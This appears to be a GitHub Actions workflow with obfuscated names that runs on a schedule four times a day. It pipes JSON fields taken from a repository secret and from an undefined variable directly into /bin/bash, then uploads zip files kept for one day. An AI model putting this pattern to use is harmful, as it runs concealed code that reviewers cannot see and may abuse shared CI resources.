name: beidanghongcui
on:
  workflow_dispatch:

  schedule:
    - cron: '48 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: beidanghongcui
        env:
          rwm413: ${{ secrets.rwm413 }}
        run: |
          printf '%s' "$rwm413" | jq -r .ypri56661 | /bin/bash
          echo $bafb7603 | jq -r .rencz82418 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Sd3qXYOg
          path: "*.zip"
          retention-days: 1
